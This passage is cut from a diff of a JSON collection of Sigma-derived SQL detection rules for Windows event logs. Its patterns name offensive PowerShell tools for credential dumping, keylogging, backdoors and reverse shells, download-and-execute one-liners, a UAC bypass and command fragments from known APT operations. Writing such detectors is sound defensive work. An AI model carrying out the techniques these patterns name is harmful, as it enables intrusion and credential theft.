'%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_certutil_encode.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsModule", - "id": "74176142-4684-4d8a-8b0a-713257e7df8e", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.defense_evasion", + "attack.persistence", + "attack.execution", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "PowerShell Get Clipboard", - "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", - "status": "experimental", - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "status": "test", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.collection", - "attack.t1115" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_clipboard.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", + "attack.t1036.004", "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Clear PowerShell History - PowerShell Module", - "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1070.003" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_clear_powershell_history.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo 